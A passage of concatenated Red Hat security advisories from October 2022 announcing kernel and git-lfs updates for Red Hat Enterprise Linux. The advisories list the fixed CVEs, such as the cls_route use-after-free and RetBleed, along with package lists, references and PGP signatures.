kpatch-patch-4_18_0-372_9_1-1-3.el8.src.rpm

ppc64le:  
kpatch-patch-4_18_0-372_13_1-1-2.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_13_1-debuginfo-1-2.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_13_1-debugsource-1-2.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_16_1-1-2.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_16_1-debuginfo-1-2.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_16_1-debugsource-1-2.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_19_1-1-1.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_19_1-debuginfo-1-1.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_19_1-debugsource-1-1.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_26_1-1-1.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_26_1-debuginfo-1-1.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_26_1-debugsource-1-1.el8_6.ppc64le.rpm  
kpatch-patch-4_18_0-372_9_1-1-3.el8.ppc64le.rpm  
kpatch-patch-4_18_0-372_9_1-debuginfo-1-3.el8.ppc64le.rpm  
kpatch-patch-4_18_0-372_9_1-debugsource-1-3.el8.ppc64le.rpm

x86_64:  
kpatch-patch-4_18_0-372_13_1-1-2.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_13_1-debuginfo-1-2.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_13_1-debugsource-1-2.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_16_1-1-2.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_16_1-debuginfo-1-2.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_16_1-debugsource-1-2.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_19_1-1-1.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_19_1-debuginfo-1-1.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_19_1-debugsource-1-1.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_26_1-1-1.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_26_1-debuginfo-1-1.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_26_1-debugsource-1-1.el8_6.x86_64.rpm  
kpatch-patch-4_18_0-372_9_1-1-3.el8.x86_64.rpm  
kpatch-patch-4_18_0-372_9_1-debuginfo-1-3.el8.x86_64.rpm  
kpatch-patch-4_18_0-372_9_1-debugsource-1-3.el8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2588  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY1fUINzjgjWX9erEAQiZvg/+L+nY+TfRh5xq4rlS439R3ThfEI2a6Wl+  
P8tkHfdkRLcgnQv1N+RQ//BVIGpkPPzGaw+H9BVrQuNt5tlnOXFVLuO8dPzKut0V  
uFHbdH6cOPRjjUqGVj2A852VUNctu8wgtEMfDjpa2WeE1lRLEWJ6wKAmyThuKUXn  
74wFW06dB7RuU1G0D9YDsJLIM+RzH2DzgEmHJzmg3teoy6HXlj+FIbDeoxfHydY5  
pPHvIYEwlmR/kReLDfto4QCQa6MVUsN1i6lJA6+SYda6lLhjVud5xBtC1dpHKIih  
FwVDwyoaecsUfDPiQrlE+qUzspXP9sTts/9Ts8N15DOKEyW9HX/cHFtTKTL8mNLB  
3vIRWIzv77PAXQuNJENHxhQtOxKE1jVBSjk/9SP38+hkKpRqa9FWV240Sec1CzO7  
B1qAwHX05qmtskdpBiB5Ihvsf5jlsvnQJxwMoIWxiLIsRaLQxhpPowgUBLNf+JrO  
7JCBP7gs8t2MCp2fcTkq3RCOd/qmmWPLbY2oNqPxlU1rtqwt0anW3kzp0iv41MVX  
V28FUuYVxuD47mCBup6ieEk0JNn0D3/SeiwS53oskrVt6eEoPSK4OsLqTWTWSqgB  
y/YbDvjgEkjOkasGYX+jK4eEvCECdYUNIVV3PHIcz+6K8blGTZ9N7P6nAyf3FaZy  
fWNyU1Ax1FY=Pu0A  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-7137-01

Red Hat Security Advisory 2022-7110-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include code execution, information leakage, memory leak, privilege escalation, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: kernel security, bug fix, and enhancement update  
Advisory ID:       RHSA-2022:7110-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:7110  
Issue date:        2022-10-25  
CVE Names:         CVE-2022-0494 CVE-2022-1353 CVE-2022-2588  
                   CVE-2022-23816 CVE-2022-23825 CVE-2022-29900  
                   CVE-2022-29901  
====================================================================  
1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder (v. 8) - aarch64, ppc64le, x86_64  
Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux  
operating system.

Security Fix(es):

* A use-after-free in cls_route filter implementation may lead to privilege  
escalation (CVE-2022-2588)

* Information leak in scsi_ioctl() (CVE-2022-0494)

* A kernel-info-leak issue in pfkey_register (CVE-2022-1353)

* RetBleed Arbitrary Speculative Code Execution with Return Instructions  
(CVE-2022-23816, CVE-2022-29900)

* Branch Type Confusion (non-retbleed) (CVE-2022-23825)

* RetBleed Arbitrary Speculative Code Execution with Return Instructions  
(CVE-2022-29901)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Add s390_iommu_aperture kernel parameter (BZ#2081324)

* Blackscreen and hangup after resume from hibernate or S3 with DFGX WX3200  
(BZ#2091065)

* Update NVME subsystem with bug fixes and minor changes (BZ#2106017)

* Fix parsing of nw_proto for IPv6 fragments (BZ#2106703)

* "vmcore failed, _exitcode:139" error observed while capturing vmcore  
during fadump after memory remove. incomplete vmcore is captured.  
(BZ#2107488)

* 'disable_policy' is ignored for addresses configured on a down interface  
(BZ#2109971)

* Backport request for new cpufreq.default_governor kernel command line  
parameter (BZ#2109996)

* Panics in mpt3sas mpt3sas_halt_firmware() if mpt3sas_fwfault_debug=1  
enabled when poweroff issued to server (BZ#2111140)

* IOMMU/DMA update for 8.7 (BZ#2111692)

* Update Broadcom Emulex lpfc driver for RHEL8.7 with bug fixes (14.0.0.13)  
(BZ#2112103)

* Incorrect Socket(s) & "Core(s) per socket" reported by lscpu command.  
(BZ#2112820)

* Panic in ch_release() due to NULL ch->device pointer, backport upstream  
fix (BZ#2115965)

* pyverbs-tests fail over qede IW HCAs on "test_query_rc_qp"  
(tests.test_qp.QPTest) (BZ#2119122)

* qedi shutdown handler hangs upon reboot (BZ#2119847)

* cache link_info for ethtool (BZ#2120197)

* Important iavf bug fixes (BZ#2120225)

* Hibernate crash with Aquantia 2.5/5 Gb LAN card (BZ#2124966)

* While using PTimekeeper the qede driver produces excessive log messages  
(BZ#2125477)

* general protection fault handling rpc_xprt.timer (BZ#2126184)

* Not enough device MSI-X vectors (BZ#2126482)

* Atlantic driver panic on wakeup after hybernate (BZ#2127845)

* Memory leak in vxlan_xmit_one (BZ#2131255)

* Missing hybernate/resume fixes (BZ#2131936)

Enhancement(s):

* Update smartpqi driver to latest upstream Second Set of Patches  
(BZ#2112354)

* qed/qede/qedr - driver updates to latest upstream (BZ#2120611)

* Update qedi driver to latest upstream (BZ#2120612)

* Update qedf driver to latest upstream (BZ#2120613)

* Include the support for new NVIDIA Mobile GFX GA103 on ADL Gen Laptops  
(BZ#2127122)

* Need to enable hpilo to support new HPE RL300 Gen11 for ARM (aarch64)  
(BZ#2129923)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2039448 - CVE-2022-0494 kernel: information leak in  scsi_ioctl()  
2066819 - CVE-2022-1353 Kernel: A kernel-info-leak issue in pfkey_register  
2090226 - CVE-2022-23816 CVE-2022-29900 hw: cpu: AMD: RetBleed Arbitrary Speculative Code Execution with Return Instructions  
2103148 - CVE-2022-29901 hw: cpu: Intel: RetBleed Arbitrary Speculative Code Execution with Return Instructions  
2103153 - CVE-2022-23825 hw: cpu: AMD: Branch Type Confusion (non-retbleed)  
2114849 - CVE-2022-2588 kernel: a use-after-free in cls_route filter implementation may lead to privilege escalation

6. Package List:

Red Hat Enterprise Linux BaseOS (v. 8):

Source:  
kernel-4.18.0-372.32.1.el8_6.src.rpm

aarch64:  
bpftool-4.18.0-372.32.1.el8_6.aarch64.rpm  
bpftool-debuginfo-4.18.0-372.32.1.el8_6.aarch64.rpm  
kernel-4.18.0-372.32.1.el8_6.aarch64.rpm  
kernel-core-4.18.0-372.32.1.el8_6.aarch64.rpm  
kernel-cross-headers-4.18.0-372.32.1.el8_6.aarch64.rpm  
kernel-debug-4.18.0-372.32.1.el8_6.aarch64.rpm  
kernel-debug-core-4.18.0-372.32.1.el8_6.aarch64.rpm  
kernel-debug-debuginfo-4.18.0-372.32.1.el8_6.aarch64.rpm  
kernel-debug-devel-4.18.0-372.32.1.el8_6.aarch64.rpm  
kernel-debug-modules-4.18.0-372.32.1.el8_6.aarch64.rpm  
kernel-debug-modules-extra-4.18.0-372.32.1.el8_6.aarch64.rpm  
kernel-debuginfo-4.18.0-372.32.1.el8_6.aarch64.rpm  
kernel-debuginfo-common-aarch64-4.18.0-372.32.1.el8_6.aarch64.rpm  
kernel-devel-4.18.0-372.32.1.el8_6.aarch64.rpm  
kernel-headers-4.18.0-372.32.1.el8_6.aarch64.rpm  
kernel-modules-4.18.0-372.32.1.el8_6.aarch64.rpm  
kernel-modules-extra-4.18.0-372.32.1.el8_6.aarch64.rpm  
kernel-tools-4.18.0-372.32.1.el8_6.aarch64.rpm  
kernel-tools-debuginfo-4.18.0-372.32.1.el8_6.aarch64.rpm  
kernel-tools-libs-4.18.0-372.32.1.el8_6.aarch64.rpm  
perf-4.18.0-372.32.1.el8_6.aarch64.rpm  
perf-debuginfo-4.18.0-372.32.1.el8_6.aarch64.rpm  
python3-perf-4.18.0-372.32.1.el8_6.aarch64.rpm  
python3-perf-debuginfo-4.18.0-372.32.1.el8_6.aarch64.rpm

noarch:  
kernel-abi-stablelists-4.18.0-372.32.1.el8_6.noarch.rpm  
kernel-doc-4.18.0-372.32.1.el8_6.noarch.rpm

ppc64le:  
bpftool-4.18.0-372.32.1.el8_6.ppc64le.rpm  
bpftool-debuginfo-4.18.0-372.32.1.el8_6.ppc64le.rpm  
kernel-4.18.0-372.32.1.el8_6.ppc64le.rpm  
kernel-core-4.18.0-372.32.1.el8_6.ppc64le.rpm  
kernel-cross-headers-4.18.0-372.32.1.el8_6.ppc64le.rpm  
kernel-debug-4.18.0-372.32.1.el8_6.ppc64le.rpm  
kernel-debug-core-4.18.0-372.32.1.el8_6.ppc64le.rpm  
kernel-debug-debuginfo-4.18.0-372.32.1.el8_6.ppc64le.rpm  
kernel-debug-devel-4.18.0-372.32.1.el8_6.ppc64le.rpm  
kernel-debug-modules-4.18.0-372.32.1.el8_6.ppc64le.rpm  
kernel-debug-modules-extra-4.18.0-372.32.1.el8_6.ppc64le.rpm  
kernel-debuginfo-4.18.0-372.32.1.el8_6.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-4.18.0-372.32.1.el8_6.ppc64le.rpm  
kernel-devel-4.18.0-372.32.1.el8_6.ppc64le.rpm  
kernel-headers-4.18.0-372.32.1.el8_6.ppc64le.rpm  
kernel-modules-4.18.0-372.32.1.el8_6.ppc64le.rpm  
kernel-modules-extra-4.18.0-372.32.1.el8_6.ppc64le.rpm  
kernel-tools-4.18.0-372.32.1.el8_6.ppc64le.rpm  
kernel-tools-debuginfo-4.18.0-372.32.1.el8_6.ppc64le.rpm  
kernel-tools-libs-4.18.0-372.32.1.el8_6.ppc64le.rpm  
perf-4.18.0-372.32.1.el8_6.ppc64le.rpm  
perf-debuginfo-4.18.0-372.32.1.el8_6.ppc64le.rpm  
python3-perf-4.18.0-372.32.1.el8_6.ppc64le.rpm  
python3-perf-debuginfo-4.18.0-372.32.1.el8_6.ppc64le.rpm

s390x:  
bpftool-4.18.0-372.32.1.el8_6.s390x.rpm  
bpftool-debuginfo-4.18.0-372.32.1.el8_6.s390x.rpm  
kernel-4.18.0-372.32.1.el8_6.s390x.rpm  
kernel-core-4.18.0-372.32.1.el8_6.s390x.rpm  
kernel-cross-headers-4.18.0-372.32.1.el8_6.s390x.rpm  
kernel-debug-4.18.0-372.32.1.el8_6.s390x.rpm  
kernel-debug-core-4.18.0-372.32.1.el8_6.s390x.rpm  
kernel-debug-debuginfo-4.18.0-372.32.1.el8_6.s390x.rpm  
kernel-debug-devel-4.18.0-372.32.1.el8_6.s390x.rpm  
kernel-debug-modules-4.18.0-372.32.1.el8_6.s390x.rpm  
kernel-debug-modules-extra-4.18.0-372.32.1.el8_6.s390x.rpm  
kernel-debuginfo-4.18.0-372.32.1.el8_6.s390x.rpm  
kernel-debuginfo-common-s390x-4.18.0-372.32.1.el8_6.s390x.rpm  
kernel-devel-4.18.0-372.32.1.el8_6.s390x.rpm  
kernel-headers-4.18.0-372.32.1.el8_6.s390x.rpm  
kernel-modules-4.18.0-372.32.1.el8_6.s390x.rpm  
kernel-modules-extra-4.18.0-372.32.1.el8_6.s390x.rpm  
kernel-tools-4.18.0-372.32.1.el8_6.s390x.rpm  
kernel-tools-debuginfo-4.18.0-372.32.1.el8_6.s390x.rpm  
kernel-zfcpdump-4.18.0-372.32.1.el8_6.s390x.rpm  
kernel-zfcpdump-core-4.18.0-372.32.1.el8_6.s390x.rpm  
kernel-zfcpdump-debuginfo-4.18.0-372.32.1.el8_6.s390x.rpm  
kernel-zfcpdump-devel-4.18.0-372.32.1.el8_6.s390x.rpm  
kernel-zfcpdump-modules-4.18.0-372.32.1.el8_6.s390x.rpm  
kernel-zfcpdump-modules-extra-4.18.0-372.32.1.el8_6.s390x.rpm  
perf-4.18.0-372.32.1.el8_6.s390x.rpm  
perf-debuginfo-4.18.0-372.32.1.el8_6.s390x.rpm  
python3-perf-4.18.0-372.32.1.el8_6.s390x.rpm  
python3-perf-debuginfo-4.18.0-372.32.1.el8_6.s390x.rpm

x86_64:  
bpftool-4.18.0-372.32.1.el8_6.x86_64.rpm  
bpftool-debuginfo-4.18.0-372.32.1.el8_6.x86_64.rpm  
kernel-4.18.0-372.32.1.el8_6.x86_64.rpm  
kernel-core-4.18.0-372.32.1.el8_6.x86_64.rpm  
kernel-cross-headers-4.18.0-372.32.1.el8_6.x86_64.rpm  
kernel-debug-4.18.0-372.32.1.el8_6.x86_64.rpm  
kernel-debug-core-4.18.0-372.32.1.el8_6.x86_64.rpm  
kernel-debug-debuginfo-4.18.0-372.32.1.el8_6.x86_64.rpm  
kernel-debug-devel-4.18.0-372.32.1.el8_6.x86_64.rpm  
kernel-debug-modules-4.18.0-372.32.1.el8_6.x86_64.rpm  
kernel-debug-modules-extra-4.18.0-372.32.1.el8_6.x86_64.rpm  
kernel-debuginfo-4.18.0-372.32.1.el8_6.x86_64.rpm  
kernel-debuginfo-common-x86_64-4.18.0-372.32.1.el8_6.x86_64.rpm  
kernel-devel-4.18.0-372.32.1.el8_6.x86_64.rpm  
kernel-headers-4.18.0-372.32.1.el8_6.x86_64.rpm  
kernel-modules-4.18.0-372.32.1.el8_6.x86_64.rpm  
kernel-modules-extra-4.18.0-372.32.1.el8_6.x86_64.rpm  
kernel-tools-4.18.0-372.32.1.el8_6.x86_64.rpm  
kernel-tools-debuginfo-4.18.0-372.32.1.el8_6.x86_64.rpm  
kernel-tools-libs-4.18.0-372.32.1.el8_6.x86_64.rpm  
perf-4.18.0-372.32.1.el8_6.x86_64.rpm  
perf-debuginfo-4.18.0-372.32.1.el8_6.x86_64.rpm  
python3-perf-4.18.0-372.32.1.el8_6.x86_64.rpm  
python3-perf-debuginfo-4.18.0-372.32.1.el8_6.x86_64.rpm

Red Hat CodeReady Linux Builder (v. 8):

aarch64:  
bpftool-debuginfo-4.18.0-372.32.1.el8_6.aarch64.rpm  
kernel-debug-debuginfo-4.18.0-372.32.1.el8_6.aarch64.rpm  
kernel-debuginfo-4.18.0-372.32.1.el8_6.aarch64.rpm  
kernel-debuginfo-common-aarch64-4.18.0-372.32.1.el8_6.aarch64.rpm  
kernel-tools-debuginfo-4.18.0-372.32.1.el8_6.aarch64.rpm  
kernel-tools-libs-devel-4.18.0-372.32.1.el8_6.aarch64.rpm  
perf-debuginfo-4.18.0-372.32.1.el8_6.aarch64.rpm  
python3-perf-debuginfo-4.18.0-372.32.1.el8_6.aarch64.rpm

ppc64le:  
bpftool-debuginfo-4.18.0-372.32.1.el8_6.ppc64le.rpm  
kernel-debug-debuginfo-4.18.0-372.32.1.el8_6.ppc64le.rpm  
kernel-debuginfo-4.18.0-372.32.1.el8_6.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-4.18.0-372.32.1.el8_6.ppc64le.rpm  
kernel-tools-debuginfo-4.18.0-372.32.1.el8_6.ppc64le.rpm  
kernel-tools-libs-devel-4.18.0-372.32.1.el8_6.ppc64le.rpm  
perf-debuginfo-4.18.0-372.32.1.el8_6.ppc64le.rpm  
python3-perf-debuginfo-4.18.0-372.32.1.el8_6.ppc64le.rpm

x86_64:  
bpftool-debuginfo-4.18.0-372.32.1.el8_6.x86_64.rpm  
kernel-debug-debuginfo-4.18.0-372.32.1.el8_6.x86_64.rpm  
kernel-debuginfo-4.18.0-372.32.1.el8_6.x86_64.rpm  
kernel-debuginfo-common-x86_64-4.18.0-372.32.1.el8_6.x86_64.rpm  
kernel-tools-debuginfo-4.18.0-372.32.1.el8_6.x86_64.rpm  
kernel-tools-libs-devel-4.18.0-372.32.1.el8_6.x86_64.rpm  
perf-debuginfo-4.18.0-372.32.1.el8_6.x86_64.rpm  
python3-perf-debuginfo-4.18.0-372.32.1.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-0494  
https://access.redhat.com/security/cve/CVE-2022-1353  
https://access.redhat.com/security/cve/CVE-2022-2588  
https://access.redhat.com/security/cve/CVE-2022-23816  
https://access.redhat.com/security/cve/CVE-2022-23825  
https://access.redhat.com/security/cve/CVE-2022-29900  
https://access.redhat.com/security/cve/CVE-2022-29901  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY1fUtdzjgjWX9erEAQhSsBAAo9lW/rCtEsWCrWMHQCIB4EhRjeuM9jki  
1bsrhq45GFS9ZjleXArh5lxLI4fGfxNtvSg3okIxd8mcXLr1HnexWZijg6OAqiK4  
Jhn3vvyyINdik/fTi9IpVnX4Tbi0x9kGfEKPJaPoaTZF0IyzjE6l/SBW6Vl4W5Rd  
m7HL+mmdb+Tew2iK23eCI6aVDO6yFdE0d1uxUFB+CNy8U+hApNTQAdiB4KiBGJ62  
Frn+EZgThTmMtygbA0CnO34/uSvzJ8sQJvygOZ18ihW26KHc5fIII9sphrDz89SM  
WgKhHag8NLZLTP3gtg3IJ4S4HdOZhbZAwPmKFf57mDS35cjYljeJ2F+61vAVcnyc  
J2Zfv/9ZLV2Y88NsbJjIefMKOkkZnO2UGoJv8ZQdX6xQ+cU/QMPPhZGjAIW9iRt0  
cR89CFJrtgovejMPus3NsvkEzMkXOIdDQuv0R+o6DpWWiq8Ku30I18L/Eq/Bv36K  
bK31VCHvHLtV9+sTjobMlNbV1m0b6EBdvLrvC9uLitw4HMMAjZx2/DaLXjbvHNmm  
I4LaicZTNaRUEby3ts8Coa1dk4BP6s2b3ZKvRPYVL0erFHOoIhxTy76cD/F8PZeF  
J9ip+64HjeUrYb63XL9EwcO8+mtkUa4UbBWUK8nCrDvsVWayxQxtrixmFhOKtXxf  
myf0cZkEBGM=KWbC  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-7110-01

Red Hat Security Advisory 2022-7129-01 - Git Large File Storage replaces large files such as audio samples, videos, datasets, and graphics with text pointers inside Git, while storing the file contents on a remote server. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: git-lfs security and bug fix update  
Advisory ID:       RHSA-2022:7129-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:7129  
Issue date:        2022-10-25  
CVE Names:         CVE-2020-28851 CVE-2020-28852 CVE-2022-1705  
                   CVE-2022-27664 CVE-2022-30630 CVE-2022-30632  
                   CVE-2022-30635 CVE-2022-32148 CVE-2022-32189  
====================================================================  
1. Summary:

An update for git-lfs is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

Git Large File Storage (LFS) replaces large files such as audio samples,  
videos, datasets, and graphics with text pointers inside Git, while storing  
the file contents on a remote server.

Security Fix(es):

* golang.org/x/text: Panic in language.ParseAcceptLanguage while parsing  
- -u- extension (CVE-2020-28851)

* golang.org/x/text: Panic in language.ParseAcceptLanguage while processing  
bcp47 tag (CVE-2020-28852)

* golang: net/http: improper sanitization of Transfer-Encoding header  
(CVE-2022-1705)

* golang: net/http: handle server errors after sending GOAWAY  
(CVE-2022-27664)

* golang: io/fs: stack exhaustion in Glob (CVE-2022-30630)

* golang: path/filepath: stack exhaustion in Glob (CVE-2022-30632)

* golang: encoding/gob: stack exhaustion in Decoder.Decode (CVE-2022-30635)

* golang: net/http/httputil: NewSingleHostReverseProxy - omit  
X-Forwarded-For not working (CVE-2022-32148)

* golang: math/big: decoding big.Float and big.Rat types can panic if the  
encoded message is too short, potentially allowing a denial of service  
(CVE-2022-32189)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* git-lfs needs to be rebuild with golang 1.17.7-1 or above

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

1913333 - CVE-2020-28851 golang.org/x/text: Panic in language.ParseAcceptLanguage while parsing -u- extension  
1913338 - CVE-2020-28852 golang.org/x/text: Panic in language.ParseAcceptLanguage while processing bcp47 tag  
2107371 - CVE-2022-30630 golang: io/fs: stack exhaustion in Glob  
2107374 - CVE-2022-1705 golang: net/http: improper sanitization of Transfer-Encoding header  
2107383 - CVE-2022-32148 golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working  
2107386 - CVE-2022-30632 golang: path/filepath: stack exhaustion in Glob  
2107388 - CVE-2022-30635 golang: encoding/gob: stack exhaustion in Decoder.Decode  
2113814 - CVE-2022-32189 golang: math/big: decoding big.Float and big.Rat types can panic if the encoded message is too short, potentially allowing a denial of service  
2124669 - CVE-2022-27664 golang: net/http: handle server errors after sending GOAWAY

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
git-lfs-2.13.3-3.el8_6.src.rpm

aarch64:  
git-lfs-2.13.3-3.el8_6.aarch64.rpm  
git-lfs-debuginfo-2.13.3-3.el8_6.aarch64.rpm  
git-lfs-debugsource-2.13.3-3.el8_6.aarch64.rpm

ppc64le:  
git-lfs-2.13.3-3.el8_6.ppc64le.rpm  
git-lfs-debuginfo-2.13.3-3.el8_6.ppc64le.rpm  
git-lfs-debugsource-2.13.3-3.el8_6.ppc64le.rpm

s390x:  
git-lfs-2.13.3-3.el8_6.s390x.rpm  
git-lfs-debuginfo-2.13.3-3.el8_6.s390x.rpm  
git-lfs-debugsource-2.13.3-3.el8_6.s390x.rpm

x86_64:  
git-lfs-2.13.3-3.el8_6.x86_64.rpm  
git-lfs-debuginfo-2.13.3-3.el8_6.x86_64.rpm  
git-lfs-debugsource-2.13.3-3.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2020-28851  
https://access.redhat.com/security/cve/CVE-2020-28852  
https://access.redhat.com/security/cve/CVE-2022-1705  
https://access.redhat.com/security/cve/CVE-2022-27664  
https://access.redhat.com/security/cve/CVE-2022-30630  
https://access.redhat.com/security/cve/CVE-2022-30632  
https://access.redhat.com/security/cve/CVE-2022-30635  
https://access.redhat.com/security/cve/CVE-2022-32148  
https://access.redhat.com/security/cve/CVE-2022-32189  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY1fUXNzjgjWX9erEAQiGaA/9G7j5ZRTLXu5JnSUotGtxSKfo6wmJyMrK  
Er/pJphpzIR9+NhOSoPOaQvxTB6vDM2mswgeAe/0YDxocNjqX9bJz9NNnxEDVbQ1  
etXnXONyPmjvifZlYmDz3YkKq02y/GAPqdo8wcWSP77LwPaJQeMQ/cj9zH1Cxeqn  
1d7tVsX8atHL8pri3faMe6MdJTtHn9q9g9Adyq919ZxKxW5XeiYvTEXxmjLRhM/E  
IA5g0numQeeNOf5jNoA4g7a7yP4N1hiW03TLum4R5phkma2N8NIGvlXaHQU4FeV9  
pxvhHD6OSxtoAHNfvedJYGKGQO+sUVBd5CsodTFW31k5pClZ04C2TVuB9RiBdf5Z  
Ge6inwUonrBAtXQ8FT8HoG7gUgSC4bAV/2LRvJICKzdRZHnjlp0cdVNkxn7ElS6B  
pnUyX1i99HRNhU1ntJABizSXdQmtQqkXvme88j4WflTPPIthG60Noo2cp41GVHjJ  
22KArPU4eJSUI41O1qyjNOpyLLR2tgiw6IwYVjmEj8gwlp6rW6BFPrAxTZ+FVOW3  
Io4bWe4Aeq4E2fJcUATNejXNysyfZ7J0mgR1CpVjHzMvlb/T4BQQxX5/Ssb6Gj2l  
livwnwNtSdd0sFV03N/upoZFgiiwDBNZ3TC8Xl0vXJrXnvfAYVbbdC9Mergpp50p  
oYR8e+wj//E=1sLF  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-7129-01

Red Hat Security Advisory 2022-7146-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include privilege escalation and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: kernel security update  
Advisory ID:       RHSA-2022:7146-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:7146  
Issue date:        2022-10-25  
CVE Names:         CVE-2022-2588  
====================================================================  
1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 7.4  
Advanced Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Server AUS (v. 7.4) - noarch, x86_64  
Red Hat Enterprise Linux Server Optional AUS (v. 7.4) - x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux  
operating system.

Security Fix(es):

* a use-after-free in cls_route filter implementation may lead to privilege  
escalation (CVE-2022-2588)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2114849 - CVE-2022-2588 kernel: a use-after-free in cls_route filter implementation may lead to privilege escalation

6. Package List:

Red Hat Enterprise Linux Server AUS (v. 7.4):

Source:  
kernel-3.10.0-693.106.1.el7.src.rpm

noarch:  
kernel-abi-whitelists-3.10.0-693.106.1.el7.noarch.rpm  
kernel-doc-3.10.0-693.106.1.el7.noarch.rpm

x86_64:  
kernel-3.10.0-693.106.1.el7.x86_64.rpm  
